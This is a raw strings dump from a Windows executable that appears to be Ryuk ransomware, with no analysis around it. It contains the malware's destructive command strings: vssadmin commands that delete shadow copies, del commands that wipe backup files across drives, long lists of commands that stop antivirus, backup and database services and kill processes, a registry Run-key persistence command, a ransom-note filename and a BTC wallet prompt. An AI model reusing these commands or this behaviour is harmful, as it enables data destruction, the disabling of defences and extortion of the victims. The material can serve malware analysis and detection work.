!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.gfids
@.rsrc
@.reloc
x ATAVAWH
@A_A^A\
L$ SVWH
\$DtXH
WATAUAVAW
fD9,Hu
A_A^A]A\_
|$ UATAUAVAWH
A_A^A]A\]
uRfD95
NfD95u
fD9T$Jt
fD9T$Jt
f9t$Jt
@USAVH
f9\$Bt
@USWAVH
L9d$Xu
|$h@KL
D$xHERMf
D$|ES@
|$T@8}
|$h@KL
@USVWH
fB9DD|u
fB9DD|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
fB9DD|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
fB9DD|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9DT|u
f9\$~t
UATAUAVAWH
A_A^A]A\]
UATAUAVAWH
t$xf9u
A_A^A]A\]
UAVAWH
H3E H3E
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
u3HcH<H
D$@H;G
S,, <Zw
CA< t(<#t
<htr<jtb<lt6<tt&<wt
!,X< w
t$ WAVAWH
s4+sP+
0A_A^_
WAVAWH
A_A^_
@8|$Pt
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
A86taH
0A_A^_
L$ WATAUAVAWH
@A_A^A]A\_
x ATAVAWH
A_A^A\
|$ UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
WAVAWH
@A_A^_
fD9t$b
D82u&H
D8t$Ht
x ATAVAWH
gfffffffH
D8d$ht
A_A^A\
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
`A_A^A]A\_^]
x ATAVAWH
0A_A^A\
\$ UVWAVAWH
A_A^_^]
@8|$^t
l$ VWATAVAWH
L$&@8t$&t0@8q
A81t@@8r
A_A^A\_^
fD94Fu
@UATAUAVAWH
e0A_A^A]A\]
SVWATAUAWH
HA_A]A\_^[
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ E
`A_A^A]A\_^]
@UATAUAVAWH
H!T$0D
uf!T$(H!T$
A_A^A]A\]
@USVWATAUAVAWH
D8l$ht
A_A^A]A\_^[]
l$ WAVAWH
A_A^_
@UATAVH
WATAUAVAWH
A_A^A]A\_
ffffff
fffffff
|$ ATAVAWH
\$@@8=!
A_A^A\
USVWAVH
A^_^[]
LcA<E3
Main Invoked.
Main Returned.
EventRegister
EventSetInformation
EventUnregister
EventWriteTransfer
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
`h````
xpxxxx
(null)
GetCurrentPackageId
LCMapStringEx
LocaleNameToLCID
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
taskkill
LookupPrivilegeValue error: %u
AdjustTokenPrivileges error: %u
The token does not have the specified privilege.
Iphlpapi.dll
GetLastError
GetSystemDefaultLangID
WaitForMultipleObjects
GetFileSizeEx
MoveFileExW
SetFilePointerEx
CreateThread
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
kernel32.dll
IsWow64Process
AamRlebaQnPcrdUQxfhhMSyJVzJEQzLgXzEwnmOhTfTNJqEwddvoCIwCjcgmSoqCKoSdcCKfRuzzsCLwEgXFJVCqmHxSBLWemHjvKtyLPNZFsy
QGDWqAqQzuTgzpJePKdAcDauoXPOTKYZQSFKBsJYKUYLhAQOiQFdulTFKqvyiMwOIzzTjhuNbJVzaxSOtnNzbqNDUWUKVuSejHjMyOVTzsKKFiZHcXmvDFBPLbyknfMKQAfymCrJmtgKnlujwDwdohjBsumNHZSueZRNntZOoyNJwTVmevyjoGiYIbSJzfZIKHqvuUsoeppbSAZtFdNeyTXzDLUvJeOhJMyCVSGrPpFjvxUXXKAeIRdiiDcDVTOAIVSeSCYNxfjuUvtNZbSEfAUHGkITnkpaQrxFTlwfPMEivWOcVCvdusvzFOjQrKpSCECJYRYbVyhpsoWbLnBsmtmzBXaJoubAWkLzANMQORitgpuHCQarSKqWfVXkwSeRwKmcLDLxKVFHJWRxYOeWyrMVrxXUuBfZZeJVaKAFeMfVOpDXlorbDIMfkftnvSWKvmrZNBJxBpIjQvPGuRwiiPIXFKqArwiagkvOofSJZXddcbDvNcHRKzXPRsdhqWpEbCxgQaacjWqnYddyiHydMSNbraTjZycQDIVnlRkVzslsAXxyDdqfUCjcogfvAsHqNabVOnniERkEYvWkIOmjTDOKFefYpgWBmyYKLKBHsvnTloJoVXGflyVQcmEGaUdQSQnKEbxjbDDQerdgiepBqNNJpoXxyxWGDPxkfAvlMqXcIYThFCkupJvKxekBiCvXznRXALgmdEceCrVVClEAfBioHYSmRVKnvqtOvKnUUTlTJdgkzYEdgwYbIAJKSSRbGbjQKIHgRsCTjshfHkFFeDjLFtnhKHKfZOfQjvFcElnXfKaZkuszzFVYqzjenOsHKPMmSUCfyPinOZDWeuUvAZLcxIvIGFKwsshMNHIQmnOPXSoqgoDsSwtlAnFFmbkhrQlDiAbnEbvsdIvnBVoMPXlOgZOYbrVbMWotnAynsqoxAHcsgODsshtXAcmMQzwgVOBbXkPMDdqUKYkdWdCSVuDpPPsLIosPCDmjKFekEVkYYNxtwAyTLwXtXKxQgiWy
InvokeMainViaCRT
"Main Invoked."
FileName
ExitMainViaCRT
"Main Returned."
FileName
Microsoft.CRTProvider
C:\Users\Admin\Documents\Visual Studio 2015\Projects From Ryuk\ConsoleApplication54\x64\Release\ConsoleApplication54.pdb
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.idata$2
.idata$3
.idata$4
.idata$6
.pdata
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
WriteProcessMemory
HeapFree
SetLastError
GetCommandLineW
GetCurrentProcess
GetModuleFileNameW
CreateFileW
GetVersionExW
GetModuleHandleA
OpenProcess
CreateToolhelp32Snapshot
GetLastError
Process32NextW
GetCurrentThread
LoadLibraryA
GlobalAlloc
DeleteFileW
Process32FirstW
GlobalFree
CloseHandle
HeapAlloc
GetWindowsDirectoryW
GetProcAddress
VirtualAllocEx
LocalFree
GetProcessHeap
FreeLibrary
CreateRemoteThread
VirtualFreeEx
KERNEL32.dll
GetTokenInformation
LookupAccountSidW
OpenThreadToken
OpenProcessToken
ImpersonateSelf
AdjustTokenPrivileges
LookupPrivilegeValueW
ADVAPI32.dll
ShellExecuteW
CommandLineToArgvW
ShellExecuteA
SHELL32.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
RaiseException
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
ExitProcess
GetModuleHandleExW
GetStdHandle
WriteFile
GetModuleFileNameA
MultiByteToWideChar
WideCharToMultiByte
GetACP
LCMapStringW
GetFileType
FindClose
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCPInfo
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
HeapSize
HeapReAlloc
SetFilePointerEx
WriteConsoleW
SystemFunction036
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
cies\System\
$3P61"
w&J;<=d
stop "Acronis VSS Provider" /y
stop "Enterprise Client Service" /y
stop "Sophos Agent" /y
stop "Sophos AutoUpdate Service" /y
stop "Sophos Clean Service" /y
stop "Sophos Device Control Service" /y
stop "Sophos File Scanner Service" /y
stop "Sophos Health Service" /y
stop "Sophos MCS Agent" /y
stop "Sophos MCS Client" /y
stop "Sophos Message Router" /y
stop "Sophos Safestore Service" /y
stop "Sophos System Protection Service" /y
stop "Sophos Web Control Service" /y
stop "SQLsafe Backup Service" /y
stop "SQLsafe Filter Service" /y
stop "Symantec System Recovery" /y
stop "Veeam Backup Catalog Data Service" /y
stop AcronisAgent /y
stop AcrSch2Svc /y
stop Antivirus /y
stop ARSM /y
stop BackupExecAgentAccelerator /y
stop BackupExecAgentBrowser /y
stop BackupExecDeviceMediaService /y
stop BackupExecJobEngine /y
stop BackupExecManagementService /y
stop BackupExecRPCService /y
stop BackupExecVSSProvider /y
stop bedbg /y
stop DCAgent /y
stop EPSecurityService /y
stop EPUpdateService /y
stop EraserSvc11710 /y
stop EsgShKernel /y
stop FA_Scheduler /y
stop IISAdmin /y
stop IMAP4Svc /y
stop macmnsvc /y
stop masvc /y
stop MBAMService /y
stop MBEndpointAgent /y
stop McAfeeEngineService /y
stop McAfeeFramework /y
stop McAfeeFrameworkMcAfeeFramework /y
stop McShield /y
stop McTaskManager /y
stop mfemms /y
stop mfevtp /y
stop MMS /y
stop mozyprobackup /y
stop MsDtsServer /y
stop MsDtsServer100 /y
stop MsDtsServer110 /y
stop MSExchangeES /y
stop MSExchangeIS /y
stop MSExchangeMGMT /y
stop MSExchangeMTA /y
stop MSExchangeSA /y
stop MSExchangeSRS /y
stop MSOLAP$SQL_2008 /y
stop MSOLAP$SYSTEM_BGC /y
stop MSOLAP$TPS /y
stop MSOLAP$TPSAMA /y
stop MSSQL$BKUPEXEC /y
stop MSSQL$ECWDB2 /y
stop MSSQL$PRACTICEMGT /y
stop MSSQL$PRACTTICEBGC /y
stop MSSQL$PROFXENGAGEMENT /y
stop MSSQL$SBSMONITORING /y
stop MSSQL$SHAREPOINT /y
stop MSSQL$SQL_2008 /y
stop MSSQL$SYSTEM_BGC /y
stop MSSQL$TPS /y
stop MSSQL$TPSAMA /y
stop MSSQL$VEEAMSQL2008R2 /y
stop MSSQL$VEEAMSQL2012 /y
stop MSSQLFDLauncher /y
stop MSSQLFDLauncher$PROFXENGAGEMENT /y
stop MSSQLFDLauncher$SBSMONITORING /y
stop MSSQLFDLauncher$SHAREPOINT /y
stop MSSQLFDLauncher$SQL_2008 /y
stop MSSQLFDLauncher$SYSTEM_BGC /y
stop MSSQLFDLauncher$TPS /y
stop MSSQLFDLauncher$TPSAMA /y
stop MSSQLSERVER /y
stop MSSQLServerADHelper100 /y
stop MSSQLServerOLAPService /y
stop MySQL80 /y
stop MySQL57 /y
stop ntrtscan /y
stop OracleClientCache80 /y
stop PDVFSService /y
stop POP3Svc /y
stop ReportServer /y
stop ReportServer$SQL_2008 /y
stop ReportServer$SYSTEM_BGC /y
stop ReportServer$TPS /y
stop ReportServer$TPSAMA /y
stop RESvc /y
stop sacsvr /y
stop SamSs /y
stop SAVAdminService /y
stop SAVService /y
stop SDRSVC /y
stop SepMasterService /y
stop ShMonitor /y
stop Smcinst /y
stop SmcService /y
stop SMTPSvc /y
stop SNAC /y
stop SntpService /y
stop sophossps /y
stop SQLAgent$BKUPEXEC /y
stop SQLAgent$ECWDB2 /y
stop SQLAgent$PRACTTICEBGC /y
stop SQLAgent$PRACTTICEMGT /y
stop SQLAgent$PROFXENGAGEMENT /y
stop SQLAgent$SBSMONITORING /y
stop SQLAgent$SHAREPOINT /y
stop SQLAgent$SQL_2008 /y
stop SQLAgent$SYSTEM_BGC /y
stop SQLAgent$TPS /y
stop SQLAgent$TPSAMA /y
stop SQLAgent$VEEAMSQL2008R2 /y
stop SQLAgent$VEEAMSQL2012 /y
stop SQLBrowser /y
stop SQLSafeOLRService /y
stop SQLSERVERAGENT /y
stop SQLTELEMETRY /y
stop SQLTELEMETRY$ECWDB2 /y
stop SQLWriter /y
stop SstpSvc /y
stop svcGenericHost /y
stop swi_filter /y
stop swi_service /y
stop swi_update_64 /y
stop TmCCSF /y
stop tmlisten /y
stop TrueKey /y
stop TrueKeyScheduler /y
stop TrueKeyServiceHelper /y
stop UI0Detect /y
stop VeeamBackupSvc /y
stop VeeamBrokerSvc /y
stop VeeamCatalogSvc /y
stop VeeamCloudSvc /y
stop VeeamDeploymentService /y
stop VeeamDeploySvc /y
stop VeeamEnterpriseManagerSvc /y
stop VeeamMountSvc /y
stop VeeamNFSSvc /y
stop VeeamRESTSvc /y
stop VeeamTransportSvc /y
stop W3Svc /y
stop wbengine /y
stop WRSVC /y
stop MSSQL$VEEAMSQL2008R2 /y
stop SQLAgent$VEEAMSQL2008R2 /y
stop VeeamHvIntegrationSvc /y
stop swi_update /y
stop SQLAgent$CXDB /y
stop SQLAgent$CITRIX_METAFRAME /y
stop "SQL Backups" /y
stop MSSQL$PROD /y
stop "Zoolz 2 Service" /y
stop MSSQLServerADHelper /y
stop SQLAgent$PROD /y
stop msftesql$PROD /y
stop NetMsmqActivator /y
stop EhttpSrv /y
stop ekrn /y
stop ESHASRV /y
stop MSSQL$SOPHOS /y
stop SQLAgent$SOPHOS /y
stop AVP /y
stop klnagent /y
stop MSSQL$SQLEXPRESS /y
stop SQLAgent$SQLEXPRESS /y
stop wbengine /y
stop kavfsslp /y
stop KAVFSGT /y
stop KAVFS /y
stop mfefire /y
55>_e0??
55>_e&3:
=&( 4
%%?'"4
6,ZcL>%
A(]}v=9
sQlQ]Z
MEou"w
%BxkIs
+#o=8y;%s5.0
%,8u+%
-1'>!2v
,88- Y
*11=.<%s
&-2=Vk`!=
B6> $Z5&(q<&
<!`dGNvX
6P& #V#7
YIlmf|
/acddO
,9l-+$
.cYXCj
>=2ljgL
#00L5$
:a9#<&>
0(5!M =&
#EN*.'yL\{VLP
N69O*5,L;
>)S%'O
vFr\m08
0I*1-.6G5,:
on^`Zf:
6&:tczP%6T4
L4' +<
%,meo+ )y
,+7FLrJB
y9,4&A
(<kU|Cg
g0*67K
0!5 7odPEl=g
&6cs6 m
1$v6,-j
7#<t?,
w(!14w
$' +5Q
<j-1:7
23zLt-.%
'ABCoa
BTC wallet:
%BxkIt6
%BxkIt2
No system is safe
/IM zoolz.exe /F
/IM agntsvc.exe /F
/IM dbeng50.exe /F
/IM dbsnmp.exe /F
/IM encsvc.exe /F
/IM excel.exe /F
/IM firefoxconfig.exe /F
/IM infopath.exe /F
/IM isqlplussvc.exe /F
/IM msaccess.exe /F
/IM msftesql.exe /F
/IM mspub.exe /F
/IM mydesktopqos.exe /F
/IM mydesktopservice.exe /F
/IM mysqld.exe /F
/IM mysqld-nt.exe /F
/IM mysqld-opt.exe /F
/IM ocautoupds.exe /F
/IM ocomm.exe /F
/IM ocssd.exe /F
/IM onenote.exe /F
/IM oracle.exe /F
/IM outlook.exe /F
/IM powerpnt.exe /F
/IM sqbcoreservice.exe /F
/IM sqlagent.exe /F
/IM sqlbrowser.exe /F
/IM sqlservr.exe /F
/IM sqlwriter.exe /F
/IM steam.exe /F
/IM synctime.exe /F
/IM tbirdconfig.exe /F
/IM thebat.exe /F
/IM thebat64.exe /F
/IM thunderbird.exe /F
/IM visio.exe /F
/IM winword.exe /F
/IM wordpad.exe /F
/IM xfssvccon.exe /F
/IM tmlisten.exe /F
/IM PccNTMon.exe /F
/IM CNTAoSMgr.exe /F
/IM Ntrtscan.exe /F
/IM mbamtray.exe /F
g*SqM5'T2Xzf
5;T5Xzf
?_>sI~
5;T4Xzf
?_?sI~
g,SqM7(
g/SqM7(
,TeRk
#_<sI~
#_=sI~
g.SqM5'T6Xzf
g!SqM5'T9Xzf
2B9s5{L8(
%B9s5{L8"
*cG{B9s5{L),
6iF"Bu/I~
B>s5{L8(
qM<iF B?s5{L
*cG{B?s53
!HtcI4X
=Bu:I~
?B<s5{L>:
qM)iF7Bu8I6X
:B=s5{L-+
!HtcI6X
%B=s5{L-
2B2s5{L8(
%B2s5{L8"
*cG{B2s5{L),
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
advapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
(null)
api-ms-win-appmodel-runtime-l1-1-1
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l2-1-1
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
user32
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
t\Documents and Settings\Default User\finish
\users\Public\finish
PUBLIC
UNIQUE_ID_DO_NOT_REMOVE
SeDebugPrivilege
csrss.exe
explorer.exe
lsaas.exe
\Documents and Settings\Default User\sys
\users\Public\sys
RyukReadMe.txt
\System32\cmd.exe
\Documents and Settings\Default User\
\users\Public\
keystorage2
/C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "
/reg:64
q2(& 8
UNIQUE_ID_DO_NOT_REMOVE
hrmlog
q2(& 8
?;Iy2(&